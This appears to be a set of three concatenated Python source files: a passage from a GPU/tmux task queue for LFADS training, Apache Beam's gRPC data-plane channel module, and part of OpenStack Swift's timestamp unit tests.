line = next(outlines)
return task_success
try:
# touch outfile to ensure it exists
touch_file(task.outfile)
# postpend tee redirection appending to outfile
# generate_tee_command can take a list of commands too and will combine with semicolons
#append = True
#command = generate_tee_command(task.command, task.outfile, append)
# prepend gpu specification
command = 'export CUDA_VISIBLE_DEVICES={}; {}'.format(gpu_index, task.command)
# wrap in tmux session and wait for completion
tmux_command = generate_tmux_command(task.name, command)
#print(tmux_command)
# if the tmux session is already running, throw an error, usually means
# this model is already training
if check_tmux_session_exists(task.name):
print(('Queue: Task {} is already running. Monitoring'.format(task.name)))
#raise ChildProcessError('Tmux session {} already exists.'.format(task.name))
pid = None
task.running_on_gpu = None
else:
# need to launch this task
with mutex:
#print(tmux_command)
subp = subprocess.Popen(tmux_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, universal_newlines=True);
time.sleep(0.1)
if not check_tmux_session_exists(task.name):
# usually this means that the command immediately failed
raise ChildProcessError('Tmux session immediately terminated running "{}" '.format(tmux_command))
pid = subp.pid
# notify master process we're starting
queue.put(TaskStartedMessage(task.index, pid, task.name))
# monitor outfile for output in real time and print when it comes in
task_success = False
with open(task.outfile, 'r') as outfile:
outlines = follow_file(outfile)
# while subp.poll() is None and check_tmux_session_exists(task.name):
while check_tmux_session_exists(task.name):
task_success = task_success or print_relevant_output_return_success_status(outlines)
time.sleep(1)
# check one last time after termination
task_success = task_success or print_relevant_output_return_success_status(outlines)
# Mark it finished so we don't need to redo next time
if task_success:
touch_file(task.donefile)
# notify master process that this task is done
queue.put(TaskCompletedMessage(task.index, task_success, get_tail_file(task.outfile, 10)))
except Exception as e:
# something went wrong, pass this along to main
queue.put(TaskExceptionMessage(task.index))
def print_task_status_summary(tasks):
num_finished = num_running = num_skipped = num_failed = 0
for task in tasks:
if task.skipped_donefile_exists:
num_skipped += 1
elif task.has_failed:
num_failed += 1
elif task.has_finished:
num_finished += 1
elif task.is_running():
num_running += 1
print(('Queue: {0} skipped, {1} finished, {2} failed, {3} running'
.format(num_skipped, num_finished, num_failed, num_running)))
def run_command_in_tmux_session_no_monitoring(session_name, command):
"""Run command in tmux session in a detached way, no monitoring of output"""
# wrap in tmux session and wait for completion
tmux_command = generate_tmux_command(session_name, command)
# if the tmux session is already running, throw an error, usually means
# this model is already training
if check_tmux_session_exists(session_name):
print(('Tmux session {} already exists'.format(session_name)))
raise ChildProcessError('Tmux session {} already exists.'.format(session_name))
with mutex:
subp = subprocess.Popen(tmux_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, universal_newlines=True);
return subp
def get_open_port():
"""Use bind(0) to get a free open port"""
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("",0))
port = s.getsockname()[1]
s.close()
return port
def launch_tensorboard_in_tmux(session_name, tensorboard_script, port):
command = 'bash {} --port={}'.format(tensorboard_script, port)
print(command)
return run_command_in_tmux_session_no_monitoring(session_name, command)
def run_lfads_queue(queue_name, tensorboard_script_path, task_specs,
gpu_list=None, one_task_per_gpu=True, max_tasks_simultaneously=None, ignore_donefile=False):
WAIT_TIME = 0.2
if 'TMUX' in os.environ:
print('Warning: tmux sessions will be nested inside the current session')
del os.environ['TMUX']
tasks = build_task_list(task_specs)
gpu_status = query_gpu_status()
if gpu_list:
gpu_status = [gpu_status[i] for i in gpu_list]
num_gpus = len(gpu_status)
# compute number of tasks we can do simultaneously
# factoring number of GPUs. If num_gpus == max_tasks_simultaneously, the
# load balancer will implicitly place one task on each gpu
num_cpus = cpu_count()
if one_task_per_gpu:
# setting max_tasks_simultaneously <= num_gpus ensures that no gpu will
# ever have more than one task due to the scheduling algorithm
if max_tasks_simultaneously is None:
max_tasks_simultaneously = num_gpus
else:
max_tasks_simultaneously = min(max_tasks_simultaneously, num_gpus)
elif max_tasks_simultaneously is None:
max_tasks_simultaneously = num_cpus-1
def print_status(x):
print(('Queue: ' + x.rstrip('\n')))
# is tensorboard running in tmux?
tensorboard_session_prefix = '{}_tensorboard'.format(queue_name)
running_tensorboard_sessions = get_list_tmux_sessions_name_starts_with(tensorboard_session_prefix)
if running_tensorboard_sessions:
# tensorboard already running
m = re.search('port(?P<port>\d+)', running_tensorboard_sessions[0])
port = m.group('port') if m is not None else None
print_status('TensorBoard already running on port {} in tmux session {}'.format(port, running_tensorboard_sessions[0]))
else:
# launch the tensorboard on an open port in a tmux session (if not already open)
port = get_open_port()
tensorboard_session = '{}_port{}'.format(tensorboard_session_prefix, port)
print_status('Launching TensorBoard on port {} in tmux session {}'.format(port, tensorboard_session))
launch_tensorboard_in_tmux(tensorboard_session, tensorboard_script_path, port)
print_status('Initializing with {} GPUs and {} CPUs, max {} simultaneous tasks'
.format(len(gpu_status), num_cpus, max_tasks_simultaneously))
# check for tasks already completed
if not ignore_donefile:
for task in tasks:
task.mark_finished_if_donefile_exists()
if task.skipped_donefile_exists:
print(('Task {}: skipping, task already completed'.format(task.name)))
# communication queue for each process
message_queue = Queue(100)
while not check_all_tasks_complete(tasks):
# check queue for new messages
do_status_summary =- False
while message_queue.qsize() > 0:
try:
msg = message_queue.get_nowait()
if type(msg) is TaskStartedMessage:
task = tasks[msg.task_index]
if msg.pid is not None:
# None means the task was already running previously, so don't print anything
print(('Task {}: started in tmux session {} on GPU {} with PID {}'.format(task.name, msg.tmux_session, task.running_on_gpu, msg.pid)))
# deduct from gpu memory
gpu = find_gpu_by_index(gpu_status, task.running_on_gpu)
gpu.memfree -= task.memory_req
gpu.incr_num_tasks()
sys.stdout.flush()
elif type(msg) is TaskCompletedMessage:
task = tasks[msg.task_index]
if msg.success:
print(('Task {}: completed successfully'.format(task.name)))
else:
task.has_failed = True
if len(msg.tail) > 0:
print(('Task {}: TERMINATED UNEXPECTEDLY. Final output:'.format(task.name)))
print((msg.tail))
else:
print(('Task {}: TERMINATED UNEXPECTEDLY with no output'.format(task.name)))
task.has_finished = True
# return to available gpu memory
gpu = find_gpu_by_index(gpu_status, task.running_on_gpu)
gpu.memfree += task.memory_req
gpu.decr_num_tasks()
do_status_summary = True
sys.stdout.flush()
elif type(msg) is TaskExceptionMessage:
task = tasks[msg.task_index]
task.has_finished = True
task.has_failed = True
print(('Task {}: INTERNAL ERROR. Exception was:'.format(task.name)))
print((msg.message))
do_status_summary = True
if task.running_on_gpu is not None:
gpu = find_gpu_by_index(gpu_status, task.running_on_gpu)
gpu.memfree += task.memory_req
gpu.decr_num_tasks()
sys.stdout.flush()
else:
print(('Unknown message {}'.format(msg)))
except Empty:
pass
# check again since tasks have now been marked complete
if check_all_tasks_complete(tasks):
break
if do_status_summary:
print_task_status_summary(tasks)
# only run a certain number of tasks at the same time to avoid inefficient use of the CPUs
if check_num_tasks_running(tasks) >= max_tasks_simultaneously:
#print_status('Waiting for free CPU to become available')
time.sleep(WAIT_TIME)
continue;
if check_all_tasks_completed_or_running(tasks):
#print_status('All tasks launched or finished, waiting for last batch to complete')
time.sleep(WAIT_TIME)
continue;
# find next task for which there is sufficient GPU memory
(task_index, gpu_index) = pick_next_task(gpu_status, tasks)
if task_index is None:
#print_status('Waiting for GPU memory to become available')
time.sleep(WAIT_TIME)
continue;
task = tasks[task_index]
#print('Task {}: launching on gpu {}'.format(task.name, gpu_index))
sys.stdout.flush()
# mark task as running
task.running_on_gpu = gpu_index
# launch a process to monitor the task, also receive messages via Queue
p = Process(target=process_launch_task_in_tmux, args=(message_queue, task, gpu_index, True))
task.process = p
p.start()
time.sleep(WAIT_TIME)
print_status('All tasks completed.')
print_task_status_summary(tasks)
# wait for all the subprocesses to complete, should be quick since all tasks are reported done now
for task in tasks:
if task.process is not None:
task.process.join()
message_queue.close()
return tasks
__all__ = [run_lfads_queue, query_gpu_status, GpuStatus, Task, get_list_tmux_sessions, check_tmux_session_exists]
|
data_plane.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of DataChannels for communicating across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import queue
import sys
import threading
from builtins import object
from builtins import range
import grpc
from future import standard_library
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
standard_library.install_aliases()
# This module is experimental. No backwards-compatibility guarantees.
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
"""A Outputstream for use with CoderImpls that has a close() method."""
def __init__(self, close_callback=None):
super(ClosableOutputStream, self).__init__()
self._close_callback = close_callback
def close(self):
if self._close_callback:
self._close_callback(self.get())
class DataChannel(with_metaclass(abc.ABCMeta, object)):
"""Represents a channel for reading and writing data over the data plane.
Read from this channel with the input_elements method::
for elements_data in data_channel.input_elements(instruction_id, targets):
[process elements_data]
Write to this channel using the output_stream method::
out1 = data_channel.output_stream(instruction_id, target1)
out1.write(...)
out1.close()
When all data for all instructions is written, close the channel::
data_channel.close()
"""
@abc.abstractmethod
def input_elements(self, instruction_id, expected_targets):
"""Returns an iterable of all Element.Data bundles for instruction_id.
This iterable terminates only once the full set of data has been recieved
for each of the expected targets. It may block waiting for more data.
Args:
instruction_id: which instruction the results must belong to
expected_targets: which targets to wait on for completion
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def output_stream(self, instruction_id, target):
"""Returns an output stream writing elements to target.
Args:
instruction_id: which instruction this stream belongs to
target: the target of the returned stream
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Closes this channel, indicating that all data has been written.
Data can continue to be read.
If this channel is shared by many instructions, should only be called on
worker shutdown.
"""
raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
"""An in-memory implementation of a DataChannel.
This channel is two-sided. What is written to one side is read by the other.
The inverse() method returns the other side of a instance.
"""
def __init__(self, inverse=None):
self._inputs = []
self._inverse = inverse or InMemoryDataChannel(self)
def inverse(self):
return self._inverse
def input_elements(self, instruction_id, unused_expected_targets=None):
for data in self._inputs:
if data.instruction_reference == instruction_id:
yield data
def output_stream(self, instruction_id, target):
def add_to_inverse_output(data):
self._inverse._inputs.append( # pylint: disable=protected-access
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
return ClosableOutputStream(add_to_inverse_output)
def close(self):
pass
class _GrpcDataChannel(DataChannel):
"""Base class for implementing a BeamFnData-based DataChannel."""
_WRITES_FINISHED = object()
def __init__(self):
self._to_send = queue.Queue()
self._received = collections.defaultdict(queue.Queue)
self._receive_lock = threading.Lock()
self._reads_finished = threading.Event()
self._closed = False
self._exc_info = None
def close(self):
self._to_send.put(self._WRITES_FINISHED)
self._closed = True
def wait(self, timeout=None):
self._reads_finished.wait(timeout)
def _receiving_queue(self, instruction_id):
with self._receive_lock:
return self._received[instruction_id]
def _clean_receiving_queue(self, instruction_id):
with self._receive_lock:
self._received.pop(instruction_id)
def input_elements(self, instruction_id, expected_targets):
"""
Generator to retrieve elements for an instruction_id
input_elements should be called only once for an instruction_id
Args:
instruction_id(str): instruction_id for which data is read
expected_targets(collection): expected targets
"""
received = self._receiving_queue(instruction_id)
done_targets = []
try:
while len(done_targets) < len(expected_targets):
try:
data = received.get(timeout=1)
except queue.Empty:
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
else:
if not data.data and data.target in expected_targets:
done_targets.append(data.target)
else:
assert data.target not in done_targets
yield data
finally:
# Instruction_ids are not reusable so Clean queue once we are done with
# an instruction_id
self._clean_receiving_queue(instruction_id)
def output_stream(self, instruction_id, target):
# TODO: Return an output stream that sends data
# to the Runner once a fixed size buffer is full.
# Currently we buffer all the data before sending
# any messages.
def add_to_send_queue(data):
if data:
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
# End of stream marker.
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=''))
return ClosableOutputStream(add_to_send_queue)
def _write_outputs(self):
done = False
while not done:
data = [self._to_send.get()]
try:
# Coalesce up to 100 other items.
for _ in range(100):
data.append(self._to_send.get_nowait())
except queue.Empty:
pass
if data[-1] is self._WRITES_FINISHED:
done = True
data.pop()
if data:
yield beam_fn_api_pb2.Elements(data=data)
def _read_inputs(self, elements_iterator):
# TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
try:
for elements in elements_iterator:
for data in elements.data:
self._receiving_queue(data.instruction_reference).put(data)
except: # pylint: disable=bare-except
if not self._closed:
logging.exception('Failed to read inputs in the data plane')
self._exc_info = sys.exc_info()
raise
finally:
self._reads_finished.set()
def _start_reader(self, elements_iterator):
reader = threading.Thread(
target=lambda: self._read_inputs(elements_iterator),
name='read_grpc_client_inputs')
reader.daemon = True
reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
"""A DataChannel wrapping the client side of a BeamFnData connection."""
def __init__(self, data_stub):
super(GrpcClientDataChannel, self).__init__()
self._start_reader(data_stub.Data(self._write_outputs()))
class GrpcServerDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataServicer, _GrpcDataChannel):
"""A DataChannel wrapping the server side of a BeamFnData connection."""
def Data(self, elements_iterator, context):
self._start_reader(elements_iterator)
for elements in self._write_outputs():
yield elements
class DataChannelFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_data_channel(self, remote_grpc_port):
"""Returns a ``DataChannel`` from the given RemoteGrpcPort."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
"""A factory for ``GrpcClientDataChannel``.
Caches the created channels by ``data descriptor url``.
"""
def __init__(self, credentials=None):
self._data_channel_cache = {}
self._lock = threading.Lock()
self._credentials = None
if credentials is not None:
logging.info('Using secure channel creds.')
self._credentials = credentials
def create_data_channel(self, remote_grpc_port):
url = remote_grpc_port.api_service_descriptor.url
if url not in self._data_channel_cache:
with self._lock:
if url not in self._data_channel_cache:
logging.info('Creating channel for %s', url)
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
channel_options = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
grpc_channel = None
if self._credentials is None:
grpc_channel = grpc.insecure_channel(url, options=channel_options)
else:
grpc_channel = grpc.secure_channel(
url, self._credentials, options=channel_options)
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._data_channel_cache[url] = GrpcClientDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel))
return self._data_channel_cache[url]
def close(self):
logging.info('Closing all cached grpc data channels.')
for _, channel in self._data_channel_cache.items():
channel.close()
self._data_channel_cache.clear()
class InMemoryDataChannelFactory(DataChannelFactory):
"""A singleton factory for ``InMemoryDataChannel``."""
def __init__(self, in_memory_data_channel):
self._in_memory_data_channel = in_memory_data_channel
def create_data_channel(self, unused_remote_grpc_port):
return self._in_memory_data_channel
def close(self):
pass
|
test_utils.py
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from __future__ import print_function
from test.unit import temptree
import ctypes
import contextlib
import errno
import eventlet
import eventlet.event
import functools
import grp
import logging
import os
import mock
import random
import re
import socket
import sys
import json
import math
import six
from six import BytesIO, StringIO
from six.moves.queue import Queue, Empty
from six.moves import range
from textwrap import dedent
import tempfile
import time
import unittest
import fcntl
import shutil
from getpass import getuser
from shutil import rmtree
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from six.moves.configparser import NoSectionError, NoOptionError
from swift.common.exceptions import Timeout, MessageTimeout, \
ConnectionTimeout, LockTimeout, ReplicationLockTimeout, \
MimeInvalid
from swift.common import utils
from swift.common.utils import is_valid_ip, is_valid_ipv4, is_valid_ipv6
from swift.common.container_sync_realms import ContainerSyncRealms
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.swob import Request, Response
from test.unit import FakeLogger
threading = eventlet.patcher.original('threading')
class MockOs(object):
def __init__(self, pass_funcs=None, called_funcs=None, raise_funcs=None):
if pass_funcs is None:
pass_funcs = []
if called_funcs is None:
called_funcs = []
if raise_funcs is None:
raise_funcs = []
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket(object):
def __init__(self, sendto_errno=None):
self.sent = []
self.sendto_errno = sendto_errno
def sendto(self, data, target):
if self.sendto_errno:
raise socket.error(self.sendto_errno,
'test errno %s' % self.sendto_errno)
self.sent.append((data, target))
def close(self):
pass
class MockSys(object):
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
# Reset the LogAdapter class thread local state. Use get_logger() here
# to fetch a LogAdapter instance because the items from
# get_logger.handler4logger above are the underlying logger instances,
# not the LogAdapter.
utils.get_logger(None).thread_locals = (None, None)
def reset_logger_state(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
reset_loggers()
try:
return f(self, *args, **kwargs)
finally:
reset_loggers()
return wrapper
class TestTimestamp(unittest.TestCase):
"""Tests for swift.common.utils.Timestamp"""
def test_invalid_input(self):
self.assertRaises(ValueError, utils.Timestamp, time.time(), offset=-1)
def test_invalid_string_conversion(self):
t = utils.Timestamp(time.time())
self.assertRaises(TypeError, str, t)
def test_offset_limit(self):
t = 1417462430.78693
# can't have a offset above MAX_OFFSET
self.assertRaises(ValueError, utils.Timestamp, t,
offset=utils.MAX_OFFSET + 1)
# exactly max offset is fine
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET)
self.assertEqual(ts.internal, '1417462430.78693_ffffffffffffffff')
# but you can't offset it further
self.assertRaises(ValueError, utils.Timestamp, ts.internal, offset=1)
# unless you start below it
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET - 1)
self.assertEqual(utils.Timestamp(ts.internal, offset=1),
'1417462430.78693_ffffffffffffffff')
def test_normal_format_no_offset(self):
expected = '1402436408.91203'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.912029,
1402436408.9120300000000000,
1402436408.91202999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.912029, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.91203_00000000'),
utils.Timestamp('1402436408.91203_00000000', offset=0),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.normal, expected)
# timestamp instance can also compare to string or float
self.assertEqual(timestamp, expected)
self.assertEqual(timestamp, float(expected))
self.assertEqual(timestamp, utils.normalize_timestamp(expected))
def test_isoformat(self):
expected = '2014-06-10T22:47:32.054580'
test_values = (
'1402440452.05458',
'1402440452.054579',
'1402440452.05458_00000000',
'1402440452.054579_00000000',
'1402440452.054580000',
'1402440452.054579999',
'1402440452.054580000_0000000000000',
'1402440452.054579999_0000ff00',
'000001402440452.054580000',
'000001402440452.0545799',
'000001402440452.054580000_0000000000',
'000001402440452.054579999999_00000fffff',
1402440452.05458,
1402440452.054579,
1402440452.0545800000000000,
1402440452.054579999,
utils.Timestamp(1402440452.05458),
utils.Timestamp(1402440452.0545799),
utils.Timestamp(1402440452.05458, offset=0),
utils.Timestamp(1402440452.05457999999, offset=0),
utils.Timestamp(1402440452.05458, offset=100),
utils.Timestamp(1402440452.054579, offset=100),
utils.Timestamp('1402440452.05458'),
utils.Timestamp('1402440452.054579999'),
utils.Timestamp('1402440452.05458', offset=0),
utils.Timestamp('1402440452.054579', offset=0),
utils.Timestamp('1402440452.05458', offset=300),
utils.Timestamp('1402440452.05457999', offset=300),
utils.Timestamp('1402440452.05458_00000000'),
utils.Timestamp('1402440452.05457999_00000000'),
utils.Timestamp('1402440452.05458_00000000', offset=0),
utils.Timestamp('1402440452.05457999_00000aaa', offset=0),
utils.Timestamp('1402440452.05458_00000000', offset=400),
utils.Timestamp('1402440452.054579_0a', offset=400),
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
expected = '1970-01-01T00:00:00.000000'
test_values = (
'0',
'0000000000.00000',
'0000000000.00000_ffffffffffff',
0,
0.0,
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
def test_not_equal(self):
ts = '1402436408.91203_0000000000000001'
test_values = (
utils.Timestamp('1402436408.91203_0000000000000002'),
utils.Timestamp('1402436408.91203'),
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91204),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.91203, offset=2),
)
for value in test_values:
self.assertTrue(value != ts)
self.assertIs(True, utils.Timestamp(ts) == ts) # sanity
self.assertIs(False, utils.Timestamp(ts) != utils.Timestamp(ts))
self.assertIs(False, utils.Timestamp(ts) != ts)
self.assertIs(False, utils.Timestamp(ts) is None)
self.assertIs(True, utils.Timestamp(ts) is not None)
def test_no_force_internal_no_offset(self):
"""Test that internal is the same as normal with no offset"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(0).internal,
utils.normalize_timestamp(0))
def test_no_force_internal_with_offset(self):
"""Test that internal always includes the offset if significant"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=240).internal,
'1402437380.58186_00000000000000f0')
self.assertEqual(
utils.Timestamp('1402437380.581859_00000001',
offset=240).internal,
'1402437380.58186_00000000000000f1')
def test_force_internal(self):
"""Test that internal always includes the offset if forced"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=True):
self.assertEqual(utils.Timestamp(0).internal,
'0000000000.00000_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=16).internal,
'1402437380.58186_0000000000000010')
def test_internal_format_no_offset(self):
expected = '1402436408.91203_0000000000000000'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.9120300000000000,
1402436408.912029,
1402436408.912029999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.91202999999999999, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.912029'),
utils.Timestamp('1402436408.912029', offset=0),
utils.Timestamp('1402436408.912029999999999'),
utils.Timestamp('1402436408.912029999999999', offset=0),
)
for value in test_values:
# timestamp instance is always equivalent
self.assertEqual(utils.Timestamp(value), expected)
if utils.FORCE_INTERNAL:
# the FORCE_INTERNAL flag makes the internal format always
# include the offset portion of the timestamp even when it's
# not significant and would be bad during upgrades
self.assertEqual(utils.Timestamp(value).internal, expected)
else:
# unless we FORCE_INTERNAL, when there's no offset the
# internal format is equivalent to the normalized format
self.assertEqual(utils.Timestamp(value).internal,
'1402436408.91203')
def test_internal_format_with_offset(self):
expected = '1402436408.91203_00000000000000f0'
test_values = (
'1402436408.91203_000000f0',
'1402436408.912030000_0000000000f0',
'1402436408.912029_000000f0',
'1402436408.91202999999_0000000000f0',
'000001402436408.912030000_000000000f0',
'000001402436408.9120299999_000000000f0',
utils.Timestamp(1402436408.91203, offset=240),
utils.Timestamp(1402436408.912029, offset=240),
utils.Timestamp('1402436408.91203', offset=240),
utils.Timestamp('1402436408.91203_00000000', offset=240),
utils.Timestamp('1402436408.91203_0000000f', offset=225),
utils.Timestamp('1402436408.9120299999', offset=240),
utils.Timestamp('1402436408.9120299999_00000000', offset=240),
utils.Timestamp('1402436408.9120299999_00000010', offset=224),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.internal, expected)
# can compare with offset if the string is internalized
self.assertEqual(timestamp, expected)
# if comparison value only includes the normalized portion and the
# timestamp includes an offset, it is considered greater
normal = utils.Timestamp(expected).normal
self.assertTrue(timestamp > normal,
'%r is not bigger than %r given %r' % (
timestamp, normal, value))
self.assertTrue(timestamp > float(normal),
'%r is not bigger than %f given %r' % (
timestamp, float(normal), value))
def test_short_format_with_offset(self):
expected = '1402436408.91203_f0'
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.short)
expected = '1402436408.91203'
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.short)
def test_raw(self):
expected = 140243640891203
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.raw)
# 'raw' does not include offset
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.raw)
def test_delta(self):
def _assertWithinBounds(expected, timestamp):
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
self.assertTrue(float(timestamp) > minimum)
self.assertTrue(float(timestamp) < maximum)
timestamp = utils.Timestamp(1402436408.91203, delta=100)
_assertWithinBounds(1402436408.91303, timestamp)
self.assertEqual(140243640891303, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=-100)
_assertWithinBounds(1402436408.91103, timestamp)
self.assertEqual(140243640891103, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=0)
_assertWithinBounds(1402436408.91203, timestamp)
self.assertEqual(140243640891203, timestamp.raw)
# delta is independent of offset
timestamp = utils.Timestamp(1402436408.91203, offset=42, delta=100)
self.assertEqual(140243640891303, timestamp.raw)
self.assertEqual(42, timestamp.offset)
# cannot go negative
self.assertRaises(ValueError, utils.Timestamp, 1402436408.91203,
delta=-140243640891203)
def test_int(self):
expected = 1402437965
test_values = (
'1402437965.91203',
'1402437965.91203_00000000',
'1402437965.912030000',
'1402437965.912030000_0000000000000',
'000001402437965.912030000',
'000001402437965.912030000_0000000000',
1402437965.91203,
1402437965.9120300000000000,
1402437965.912029,
1402437965.912029999999999999,
utils.Timestamp(1402437965.91203),
utils.Timestamp(1402437965.91203, offset=0),
utils.Timestamp(1402437965.91203, offset=500),
utils.Timestamp(1402437965.912029),
utils.Timestamp(1402437965.91202999999999999, offset=0),
utils.Timestamp(1402437965.91202999999999999, offset=300),
utils.Timestamp('1402437965.91203'),
utils.Timestamp('1402437965.91203', offset=0),
utils.Timestamp('1402437965.91203', offset=400),
utils.Timestamp('1402437965.912029'),
utils.Timestamp('1402437965.912029', offset=0),
utils.Timestamp('1402437965.912029', offset=200),
utils.Timestamp('1402437965.912029999999999'),
utils.Timestamp('1402437965.912029999999999', offset=0),
utils.Timestamp('1402437965.912029999999999', offset=100),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(int(timestamp), expected)
